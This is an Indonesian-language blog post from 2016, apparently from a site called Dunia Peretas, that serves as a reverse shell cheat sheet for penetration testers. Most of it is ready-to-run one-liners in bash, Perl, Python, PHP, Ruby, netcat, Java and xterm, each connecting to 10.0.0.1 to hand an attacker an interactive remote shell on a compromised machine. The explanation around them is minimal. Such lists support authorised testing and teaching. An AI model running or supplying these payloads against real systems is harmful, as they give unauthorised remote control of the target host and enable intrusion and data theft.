DUNIA PERETAS Tutorial Reverse Shell Cheat Sheet Command Tutorial

Reverse Shell Cheat Sheet Command Tutorial

October 29, 2016 Tutorial

Bagi kamu yang sering menemukan kerentanan dalam area penetrasi (pentest) biasanya kamu akan segera menginginkan sebuah shell interaktif agar kamu bisa masuk dengan mudah pada itu system.

Jika tidak mungkin kamu bisa menambahkan akun/kunci ssh/.rhosts file baru dan hanya login, langkah selanjutnya mungkin lebih baik kembali ke reverse shell atau mungkin mengikat shell ke TCP.

Reverse shell biasanya di batasi oleh beberapa script yang ada pada target system maksutnya script-script tertentu yang bisa di ekskusi atau di gunakan.

Berikut perintah Reverse shell

Bash Reverse Shell

Bash shell biasanya di gunakan pada pengguna linux, Contoh: dari bash shell yang di uji pada linux Ubuntu 10.10

Bash bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Perl Rever Shell

perintah

Perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python Reverse Shell

Dapat di uji pada python Linux versi 2.7

Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Php Reverse Shell

Perintah ekskusi shell, oh ya jika tidak bekerja coba menggunakan versi 4, 5 atau versi 6

Php php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Ruby Reverse Shell

Ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

Netcat Reverse Shell

Netcat biasanya tidak mendukung untuk beberapa System Operasi namun mungkin kamu memerlukannya

Netcat nc -e /bin/sh 10.0.0.1 1234

Java Reverse Shell

Java r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Dan yang terakhir Xtrem Reverse Shell

Berikut ini merupakan type sederhana dari reverse shell Xterm perintah berikut harus di jalankan pada server contoh

Xtrem xterm -display 10.0.0.1:1

BACA JUGA: INSTALL DAN PASANG FIREWALL UFW DI LINUX

Share this :

Unknown

Author merupakan seorang yang tertarik dengan cyber security namun bukan security expert

0 Komentar

Penulisan markup di komentar

Silahkan tinggalkan komentar jangan memasang link aktif, iklan dan spam saya yakin kamu bukan pecundang.
Untuk menyisipkan kode gunakan <i rel="code"> kode yang akan disisipkan </i>
Untuk menyisipkan kode panjang gunakan <i rel="pre"> kode yang akan disisipkan </i>
Untuk menyisipkan quote gunakan <i rel="quote"> catatan anda </i>
Untuk menyisipkan gambar gunakan <i rel="image"> URL gambar </i>
Untuk menyisipkan video gunakan [iframe] URL embed video [/iframe]
Kemudian parse kode tersebut pada kotak di bawah ini
© 2016 Dunia Peretas✔

Subscribe to: Post Comments (Atom)